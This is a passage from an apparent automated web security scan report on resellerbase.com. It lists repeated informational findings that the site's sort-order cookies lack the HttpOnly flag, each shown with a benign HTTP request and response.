Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:10:40 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:10:40 GMT; path=/
Location: /detail/42/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.48. http://www.resellerbase.com/detail/44/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/44/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=44&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:16:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:16:25 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:16:25 GMT; path=/
Location: /detail/44/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.49. http://www.resellerbase.com/detail/45/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/45/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=45&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:22:38 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:22:38 GMT; path=/
Location: /detail/45/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.50. http://www.resellerbase.com/detail/46/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/46/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

id=46&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:08:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:08:55 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:08:55 GMT; path=/
Location: /detail/46/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.51. http://www.resellerbase.com/detail/5/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/5/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=5&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:03:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:03:15 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:03:15 GMT; path=/
Location: /detail/5/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.52. http://www.resellerbase.com/detail/6/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/6/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/6/whitelabeldropshipper-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=6&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:02:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:02:03 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:02:03 GMT; path=/
Location: /detail/6/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.53. http://www.resellerbase.com/detail/7/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/7/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/7/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/proxyonline-info-website-monitoring.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=7&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:19:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:19:16 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:19:16 GMT; path=/
Location: /detail/7/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.54. http://www.resellerbase.com/detail/8/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/8/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/8/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=8&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:18:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:17:59 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:17:59 GMT; path=/
Location: /detail/8/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.55. http://www.resellerbase.com/detail/9/rating.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/9/rating.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /detail/9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

id=9&rating=5

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:18:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=deleted; expires=Tue, 17-Nov-2009 23:18:35 GMT; path=/
Set-Cookie: COOKIE_SORT_ORDER=deleted; expires=Tue, 17-Nov-2009 23:18:35 GMT; path=/
Location: /detail/9/rating.php
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.56. http://www.resellerbase.com/goods-wholesale/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /goods-wholesale/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /goods-wholesale/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.57. http://www.resellerbase.com/power_search.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /power_search.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 22:57:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /power_search.php?features%255b%255d=2&cat=7&title=555-555-0199@example.com&price=555-555-0199@example.com&email=wiener@example.com&contact_name=Peter%2bWiener&pflag=search&submit=Search&url=555-555-0199@example.com
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.58. http://www.resellerbase.com/resources-information/ebooks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resources-information/ebooks/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:49:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /resources-information/ebooks/
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.59. http://www.resellerbase.com/tag/TGP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/TGP

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/TGP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/TGP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/TGP
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.60. http://www.resellerbase.com/tag/VOIP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/VOIP HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/VOIP
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.61. http://www.resellerbase.com/tag/adult

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/adult
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.62. http://www.resellerbase.com/tag/adult+content

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/adult+content HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/adult+content
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.63. http://www.resellerbase.com/tag/broadband

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/broadband HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/broadband
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.64. http://www.resellerbase.com/tag/cam

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/cam
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.65. http://www.resellerbase.com/tag/cellular

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/cellular HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/cellular
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.66. http://www.resellerbase.com/tag/chat

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/chat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/chat HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/chat
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:56:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/chat
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.67. http://www.resellerbase.com/tag/dating

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dating

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/dating HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/dating
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:54:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/dating
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.68. http://www.resellerbase.com/tag/domain

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domain HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domain
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.69. http://www.resellerbase.com/tag/domain+name

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+name

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domain+name HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+name
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:55:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domain+name
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.70. http://www.resellerbase.com/tag/domain+names

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domain+names

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domain+names HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domain+names
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:53:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domain+names
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.71. http://www.resellerbase.com/tag/domains

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/domains

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /tag/domains HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/domains
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response

HTTP/1.1 302 Found
Date: Wed, 17 Nov 2010 23:57:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Set-Cookie: COOKIE_SORT_BY=title; path=/
Set-Cookie: COOKIE_SORT_ORDER=asc; path=/
Location: /tag/domains
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Connection: close
Content-Type: text/html


4.72. http://www.resellerbase.com/tag/dropshipper

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/dropshipper

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

